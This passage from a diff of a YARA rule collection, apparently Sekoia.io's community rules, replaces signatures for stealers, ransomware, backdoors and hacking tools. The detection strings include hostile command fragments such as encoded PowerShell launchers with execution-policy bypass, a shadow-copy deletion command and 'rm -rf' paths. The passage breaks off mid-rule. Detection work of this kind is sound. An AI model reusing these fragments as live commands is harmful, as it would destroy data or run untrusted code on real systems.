+		uint16( 0 ) == 0x5A4D and 1 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d0e0c140e4831f835bcdcc6b463f3acc" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "22c92a1ba6ffd828637d7045261db7a45608ddd6d7c85836af011b3c679c725f" )
 }
-rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
+rule SEKOIA_Infostealer_Win_44Caliber : FILE
 {
 	meta:
-		description = "Detects EDRSandblast API strings"
+		description = "Finds samples of the 44Caliber stealer"
 		author = "Sekoia.io"
-		id = "8a5dc171-dce8-4b5a-96e9-53dd1855e8c1"
-		date = "2024-01-08"
+		id = "44e5bbc1-f442-47d3-8431-25182f38439d"
+		date = "2022-03-08"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_edrsandblast_api_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cd6afe68cf04e4949add323e0b5af5ea577b3dca07743e312e8236bf5c937672"
+		reference = "https://github.com/razexgod/44CALIBER"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_44caliber.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4b80d6b2116f53926897aa79a7c232413974caefaf524f50e6a7cede11f3aaa0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235234,28 +236062,34 @@ rule SEKOIA_Tool_Edrsandblast_Api_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] Required driver file not present at" wide
-		$ = "[!] New uninstall / install attempt failed" wide
-		$ = "[!] Kernel offsets are missing from the CSV" wide
-		$ = "[+] Downloading wdigest offsets from the MS Symbol Server" wide
-		$ = "[+] Check if EDR callbacks are registered on process" wide
+		$str0 = "44 CALIBER" fullword ascii
+		$str1 = "https://api.vimeworld.ru/user/name/" wide
+		$str2 = "https://freegeoip.app/xml/" wide
+		$str3 = "SOFTWARE\\Wow6432Node\\Valve\\Steam" wide
+		$str4 = "VPN\\NordVPN\\\\accounts.txt" wide
+		$str5 = "OpenVPN Connect\\profiles" wide
+		$str6 = "FuckTheSystem Copyright" wide
+		$str7 = "lolz.guru" wide
+		$str8 = "xss.is" wide
+		$str9 = "Test message recieved successfully! :raised_hands:" wide
+		$str10 = "Specify a single character: either D or F" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		uint16( 0 ) == 0x5A4D and 9 of ( $str* ) and filesize > 100KB and filesize < 1MB
 }
-
-rule SEKOIA_Wiper_Win_Nominatus_Toxicbattery : FILE
+rule SEKOIA_Apt_Gelsemium_Firewood_Backdoor : FILE
 {
 	meta:
-		description = "Detect the Nominatus_ToxicBattery malware"
+		description = "Detects Gelsemium's FireWood backdoor"
 		author = "Sekoia.io"
-		id = "0262378f-f509-4ea4-a3eb-cd0183c4361d"
-		date = "2022-11-21"
+		id = "93670c07-9edd-4ea2-b8ed-6fee625491f4"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_win_nominatus_toxicbattery.yar#L4-L42"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c226a4c3bcc451482eb782c1cb84f3e956be1e214368d1b315076078d3148955"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gelsemium_firewood_backdoor.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2251bc7910fe46fd0baf8bc05599bdcf"
+		logic_hash = "dea8c7cfb35b3cc026a0df844e118b495e3ad0a85f55e2fd3b63a41dde2ea944"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235263,35 +236097,32 @@ rule SEKOIA_Wiper_Win_Nominatus_Toxicbattery : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DISK"
-		$ = "FileNaME"
-		$ = "FILNAME"
-		$ = "runCommand"
-		$ = "HAHAH"
-		$ = "Damage"
-		$ = "fastInfector"
-		$ = "d:\\again\\SharpDevelop Projects\\RInjector\\Virus.win32RozbehStrike\\obj\\Debug\\Nominatus_ToxicBattery.pdb"
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" wide
-		$ = "\\Antivirus.bat" wide
-		$ = "\\Antivirus3.vbs" wide
-		$ = "vssadmin Delete Shadows /all /quiet" wide
+		$ = "root dir:%s"
+		$ = "df -h|grep 'dev' |grep -v none|awk '/dev/{print $6}'"
+		$ = "rm -rf ../lib/%s"
+		$ = "Total Disk space:%luG, Free Disk spae:%luG"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e7f35c173c34b7080d437a90ec90a982" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "2e25c5d3baba182f008a5a15c6f06403" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "70b1c002e4c0c9782c7ce1ef4a13c58ec1da54a26fd06dd7821a71f29431da82" )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
+rule SEKOIA_Apt_Kimsuky_Vbs : FILE
 {
 	meta:
-		description = "Detect the Squirrelwaffle DLL"
+		description = "VBS files used by Kimsuky"
 		author = "Sekoia.io"
-		id = "bea3125e-6e84-435f-855b-fd3239a0deac"
-		date = "2021-09-20"
+		id = "3f92dbda-2ddb-4fa3-a587-743f65ced9e4"
+		date = "2024-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_squirrelwaffle.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "ab1a95f09564d0417d5c06c578d4dc8d790ec09bc67716d8c9e5207262a0594d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_vbs.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "12386be22ca82fce98a83a5a19e632bc"
+		hash = "7b5783d42240651af78ebf7e01b31fe8"
+		hash = "ff7d68e5fb253664ce64c85457b28041"
+		hash = "622358469e5e24114dd0eb03da815576"
+		hash = "edbb2aa40408e2a7936067ace38b445b"
+		hash = "73ed9b012785dc3b3ee33aa52700cfe4"
+		logic_hash = "b4a05a50c8223198082f6f6aa7309cc19b019738fb99e37c6f2140b8ef7cecc9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235299,53 +236130,51 @@ rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "AEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" ascii
-		$s2 = "c:\\equal\\True\\bird_Select\\780\\true.pdb" ascii
+		$ = ")):Next:Execute " ascii
+		$ = "=\"\":" ascii
+		$ = "\":for "
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Kimsuky_Toddlershark_Strings : FILE
+rule SEKOIA_Backdoor_Powershellempire_Batlauchers : FILE
 {
 	meta:
-		description = "Detects Kimsuky TODDLERSHARK vbs malware"
+		description = "Detect BAT launchers for Empire"
 		author = "Sekoia.io"
-		id = "2db1a424-9e83-4168-8ebf-d3b415b6a576"
-		date = "2024-03-06"
+		id = "ad371665-ec59-45c8-9d99-2a675842c384"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_toddlershark_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dee9d03f498437dd6d8399975cd91ec44307067ac4642b9ff31df1a6d6b10468"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_powershellempire_batlauchers.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0453c739ad936b0cc5ed2e36ba4a011a90600b74ca23c08165c23a3e63fe60e9"
 		score = 75
-		quality = 80
+		quality = 74
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "On Error Resume Next"
-		$ = ".open \"POST\", \"http"
-		$ = ".setRequestHeader"
-		$ = ".send"
-		$ = "Execute("
-		$ = ".responseText)"
+		$ = "powershell -noP -sta -w 1 -enc  SQB" nocase wide ascii
+		$ = "powershell -ep bypass -noP -sta -w 1 -enc SQB" nocase wide ascii
+		$ = "-nol -nop -ep bypass \"[IO.File]::ReadAllText('%~f0')|iex" nocase wide ascii
 
 	condition:
-		all of them and filesize < 450
+		any of them and filesize < 1MB
 }
-rule SEKOIA_Water_Sigbin_Group
+rule SEKOIA_Apt_Polonium_Powershell_Creepydrive_Strings
 {
 	meta:
-		description = "Detects IOCs related to the 8220 Mining group."
+		description = "Detects POLONIUM CreepyDrive Powershell implant"
 		author = "Sekoia.io"
-		id = "c49728e8-db7e-4d83-97d2-7d56b51f8a52"
-		date = "2024-06-11"
+		id = "0ba196bd-9cd6-4553-b7bf-69989cdb8be4"
+		date = "2022-06-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/water_sigbin_group.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dd51945bf79e37b50d377eda3641eb32438dcb5a1c55fb4a9b66a5b5a8b5ed0d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_polonium_powershell_creepydrive_strings.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "28b8f10a36d13e97e606b082f20c50c3d48241409e7f1aca621e2af9d756dbe5"
 		score = 75
 		quality = 80
 		tags = ""
@@ -235353,64 +236182,71 @@ rule SEKOIA_Water_Sigbin_Group
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Z12A3" ascii fullword
-		$s2 = "FromBase64String" ascii fullword
-		$s3 = "Start-Process" ascii fullword
-		$s4 = "WriteAllBytes" ascii fullword
+		$ = "function Exec($comm)" base64 ascii wide
+		$ = "$comm = $comm + \"| outstring" base64 ascii wide
+		$ = "Invoke-Expression -Command:$comm" base64 ascii wide
+		$ = "microsoft.com" base64 ascii wide
+		$ = "$req = Invoke-WebRequest" base64 ascii wide
+		$ = "$j += $data" base64 ascii wide
+		$ = "$res = Exec($arr[$i])" base64 ascii wide
+		$ = "$arr = @(iex \"$req\")" base64 ascii wide
+		$ = "elseif ($req -cmatch" base64 ascii wide
+		$ = "graph.microsoft.com" base64 ascii wide
 
 	condition:
-		all of them
+		3 of them
 }
-rule SEKOIA_Ransomware_Win_Blackcat : FILE
+rule SEKOIA_Rat_Win_Xworm_V3 : FILE
 {
 	meta:
-		description = "Detect the BlackCat ransomware (Windows version)"
+		description = "Finds XWorm (version XClient, v3) samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "873355f7-3942-4171-9df7-f524bb6b6903"
-		date = "2022-01-19"
+		id = "5fb1cbd3-1e37-43b9-9606-86d896f2150b"
+		date = "2023-03-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_blackcat.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8a60fd14835f9e8683c3e60a19f23bc00020ccd22e74bffbc8ed19fcb8d0e39a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_xworm_v3.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "0016647c3c7031e744c0af6f9eadb73ab5cab1ca4f8ce7633f4aa069b62755cd"
+		hash = "07e747a9313732d2dcf7609b6a09ac58d38f5643299440b827ec55f260e33c12"
+		hash = "de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147"
+		logic_hash = "9a50f41f6c295f48597f6db3f5d9141345b3711ef110a0f925c881f3a75580ca"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		version = "1.0"
 		classification = "TLP:CLEAR"
-		version = "1.1"
 
 	strings:
-		$s1 = "desktop_image::set_desktop_wallpaper=" ascii
-		$s2 = "C:\\Users\\Public\\All Usersdeploy_note_and_image_for_all_users=" ascii
-		$s3 = "propagate::none" ascii
-		$s4 = "propagate::failed=" ascii
-		$s5 = "propagate::ok=" ascii
-		$s6 = "query_status_process::ok=" ascii
-		$s7 = "enum_dependent_services::ok=" ascii
-		$s8 = "enum_dependent_services::error=" ascii
-		$s9 = "try_stop=" ascii
-		$s10 = "try_stop::ok=" ascii
-		$s11 = "try_stop::failed=" ascii
-		$s12 = "stop=" ascii
-		$s13 = "dependent_service_name=" ascii
-		$s14 = "kill_all=" ascii
-		$s15 = "detach=" ascii
+		$str01 = "$VB$Local_Port" ascii
+		$str02 = "$VB$Local_Host" ascii
+		$str03 = "get_Jpeg" ascii
+		$str04 = "get_ServicePack" ascii
+		$str05 = "Select * from AntivirusProduct" wide
+		$str06 = "PCRestart" wide
+		$str07 = "shutdown.exe /f /r /t 0" wide
+		$str08 = "StopReport" wide
+		$str09 = "StopDDos" wide
+		$str10 = "sendPlugin" wide
+		$str11 = "OfflineKeylogger Not Enabled" wide
+		$str12 = "-ExecutionPolicy Bypass -File \"" wide
+		$str13 = "Content-length: 5235" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 2MB and filesize < 4MB and all of them
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
+rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
 {
 	meta:
-		description = "Detects RotRot backdoor based on strings"
+		description = "Detects a PowerShell dropper used by Kimsuky"
 		author = "Sekoia.io"
-		id = "f7bc195a-0e60-4495-b78a-78f101543700"
-		date = "2024-06-10"
+		id = "8b346e05-215b-46c0-82bf-fce3a65440f3"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_rotrot_strings.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "425168003d0f14d791e7f46bf47c18652a1f6b66b9329155d2bca72cf0d8126b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_powershell_dropper_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e98f23ddf02049126786e9300e7b6661b2a74817b36e2f3a661b07b24ef4402d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235418,40 +236254,26 @@ rule SEKOIA_Apt_Muddywater_Rotrot_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "qsphsbnebub"
-		$s2 = "rtqitcofcvc"
-		$s3 = "surjudpgdwd"
-		$s4 = "tvskveqhexe"
-		$s5 = "uwtlwfrifyf"
-		$s6 = "vxumxgsjgzg"
-		$t1 = "MpbeMjcsbs"
-		$t2 = "NqcfNkdtct"
-		$t3 = "OrdgOleudu"
-		$t4 = "PsehPmfvev"
-		$t5 = "QtfiQngwfw"
-		$t6 = "RugjRohxgx"
-		$u1 = "UfsnjobufKpcPckfdu"
-		$u2 = "VgtokpcvgLqdQdlgev"
-		$u3 = "WhuplqdwhMreRemhfw"
-		$u4 = "XivqmrexiNsfSfnigx"
-		$u5 = "YjwrnsfyjOtgTgojhy"
-		$u6 = "ZkxsotgzkPuhUhpkiz"
+		$s1 = "try { " ascii wide
+		$s2 = "); } catch(e){} } if ("
+		$s3 = "WScript.Sleep("
+		$s4 = " } catch(e) { }"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 300KB and any of ( $s* ) and any of ( $t* ) and any of ( $u* )
+		filesize > 500KB and $s1 at 0 and $s2 in ( filesize -1000 .. filesize ) and $s3 in ( filesize -1000 .. filesize ) and $s4 in ( filesize -1000 .. filesize )
 }
-rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
+rule SEKOIA_Apt_Suspected_Sandworm_Sdelete_Wiper : FILE
 {
 	meta:
-		description = "Finds Nemesis Stealer samples based on specific strings, from samples without strings obsucation, or from memory"
+		description = "Detects Sdelete wiper"
 		author = "Sekoia.io"
-		id = "01d85bd5-ea93-44ff-b36a-9cd9eb54d634"
-		date = "2023-03-29"
+		id = "c1419b11-33e5-4280-b92a-039719cb17d3"
+		date = "2023-10-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_nemesis_in_memory.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "65d2dd9a10238e6d65d8992aa9cc145f73bcba9be49ed552f8b0c44723ec4c87"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_suspected_sandworm_sdelete_wiper.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "094b946b89cfb475b8692f88af73fa8768a933139e0df9d6e7d7aa8614d3ab14"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235459,35 +236281,25 @@ rule SEKOIA_Infostealer_Win_Nemesis_In_Memory : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "NemesisProject.Modules." ascii
-		$str02 = "~[NEMESIS INIZIALIZE]~" wide
-		$str03 = "Clip_BoardText.txt" wide
-		$str04 = "stealer_out.zip" wide
-		$str05 = "<span style=\"color:#FFFFFF\">Number of running processes:</span>" wide
-		$str06 = "<span style=\"color:#FFFFFF\">Installed FireWall: </span>" wide
-		$str07 = "~[Panel_Receiving_Data]~ Incorrect data when receiving data on the panel" wide
-		$str08 = "ProcessInfo_Log.txt" wide
-		$str09 = "Installed_Software_Log.txt" wide
-		$str10 = "Detect Data ClipBoard] - [ {DateTime.Now:MM.dd.yyyy - HH:mm:ss}]" wide
-		$str11 = "VPN/ProtonVPN_Log.txt" wide
-		$str12 = "VPN/Nord_Log.txt" wide
-		$str13 = "Steam/SteamID_Log.txt" wide
+		$s1 = ".exe -accepteula -r -s -q" wide
+		$s2 = "sdelete [-p passes] [-r]" wide
+		$s3 = "!This program cannot be run in DOS mode."
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint16be( 0 ) == 0x4d5a and $s1 and $s2 and #s3 == 2 and filesize < 500KB
 }
-rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
+rule SEKOIA_Exploit_Linux_Eop_Pwnkit_Strings : FILE
 {
 	meta:
-		description = "Detects Mimikatz on strings obfuscation"
+		description = "Detects Pwnkit Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "bac4bb61-d250-4fc3-95a5-edd4e3c7ff83"
-		date = "2022-07-22"
+		id = "8637c602-62da-4983-bcb7-ba546fb2ed82"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_mimikatz_obfuscated.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9f75e10122df0f57382e939d82b0ab4047d3d42f198c59faa22177d6d5d9afd7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_pwnkit_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9805cc7a6022f7a3372df5d74cef68c6fd0e51072154c82212415846f3603667"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235495,32 +236307,29 @@ rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xor1 = "Benjamin Delpy" xor
-		$xor2 = "sekurlsa" xor wide
-		$xor3 = "minidumpfile.dmp" wide
-		$xor4 = "lsadump_dcsync" xor wide
-		$xor5 = "kuhl_m_lsadump_getSamKey" xor wide
-		$b1 = "Benjamin Delpy" base64
-		$b2 = "sekurlsa" base64 wide
-		$b3 = "minidumpfile.dmp" base64 wide
-		$b4 = "lsadump_dcsync" base64 wide
-		$b5 = "kuhl_m_lsadump_getSamKey" base64 wide
+		$ = "CHARSET=PWNKIT"
+		$ = "i/do/not/exists"
+		$ = "pwnkit/pwnkit.c"
+		$ = "/usr/bin/pkexec"
+		$ = "SHELL=pwnkit"
+		$ = "pwnkit.so"
+		$ = "./pwnkit/"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 5MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Hacktool_Stowaway_Strings : FILE
+rule SEKOIA_Trojan_Android_Cerberus : FILE
 {
 	meta:
-		description = "Detects Stowaway based on strings"
+		description = "Detect samples of the Android banking trojan Cerberus, or its family"
 		author = "Sekoia.io"
-		id = "a952b45a-269b-4075-bf72-16d6d863e97c"
-		date = "2023-11-15"
+		id = "3ea398bd-a80c-40f4-ad52-73b528add4ad"
+		date = "2022-01-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_stowaway_strings.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "10d28637e47d43497923a192c9e3a8bb35b480a314c71132866bdf0e49c2c460"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_android_cerberus.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "18109733d15c994015646e786a7c6177a1209200fd4c80042db3d48c97c02030"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235528,33 +236337,30 @@ rule SEKOIA_Hacktool_Stowaway_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "agent.CloseLowConn"
-		$ = "agent.CloseListener"
-		$ = "agent.SimpleNodeInit"
-		$ = "agent.HandleConnToLowerNode"
-		$ = "agent.HandleConnFromLowerNode"
-		$ = "common.NewPassToLowerNodeData"
-		$ = "agent.HandleSimpleNodeConn"
-		$ = "agent.HandleConnToUpperNode"
-		$ = "agent.HandleConnFromUpperNode"
-		$ = "agent.StartSocks"
+		$str0 = "assets/neurax.txt"
+		$str1 = "assets/Card_UpPotency_UI.json"
+		$str2 = "assets/Card_SignetFoster_UI.json"
+		$str3 = "assets/Gene_EmpathyTrainer.png"
+		$bin0 = "assets/180417.bin"
+		$bin1 = "assets/180513.bin"
+		$bin2 = "assets/180527.bin"
+		$bin3 = "assets/180528.bin"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
+		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and 3 of ( $str* ) and 3 of ( $bin* )
 }
-rule SEKOIA_Tool_Tokenplayer_Strings : FILE
+rule SEKOIA_Hacktool_Ntdsdumpex_Strings : FILE
 {
 	meta:
-		description = "Detects TokenPlayer based on strings"
+		description = "Detects NTDSDumpEx based on strings"
 		author = "Sekoia.io"
-		id = "74ed8812-f113-47a9-9ff2-6cbe2746ee11"
-		date = "2024-11-04"
+		id = "9a0fe20a-49e9-4aaf-8f0e-d51800e0a6e0"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_tokenplayer_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f01eae4ee3cc03d621be7b0af7d60411"
-		logic_hash = "e419fa8c690816cd0e449f0a1d66d170e8806b38a99758631719b239363e330e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_ntdsdumpex_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3295816133ca00aeaf3f4967135ed045ed64d20393f482eafbe4e74f0f63aa47"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -235562,142 +236368,224 @@ rule SEKOIA_Tool_Tokenplayer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*]Spawning Process as user: %s\\%s" wide
-		$ = "[-]Target isn't vulnerable!"
-		$ = "[+]Process spawned!"
-		$ = "[+]Process Spawned"
-		$ = "[+]OpenProcessToken() success!"
-		$ = "CreateProcessWithLogonW() error : % u"
-		$ = "[+]CreateProcessWithLogonW() succeed!"
-		$ = "TokenPlayer.pdb"
+		$ = "Example : ntdsdumpex.exe -r" ascii wide
+		$ = "[x]can not open output file %s for write." ascii wide
+		$ = "[+]dump completed in %.3f seconds." ascii wide
+		$ = "[+]total %d entries dumped,%d" ascii wide
+		$ = "[x]can not get PEK!" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 500KB
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
-rule SEKOIA_Rat_Darkvision_String : FILE
+rule SEKOIA_Nomercy : FILE
 {
 	meta:
-		description = "DarkVision RAT based on string"
+		description = "Detect NoMercy sample version up to 1.1.0"
 		author = "Sekoia.io"
-		id = "ab698a79-42ee-452a-a3ba-1a9872d5e2bc"
-		date = "2024-09-17"
+		id = "2591f74b-8ab8-45ef-ba64-62a93df305c1"
+		date = "2022-07-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_darkvision_string.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "8ec5526cecc596e0711c82e39cd4f2ce"
-		hash = "2dd476464e46d91ffe68483cb478d9b4"
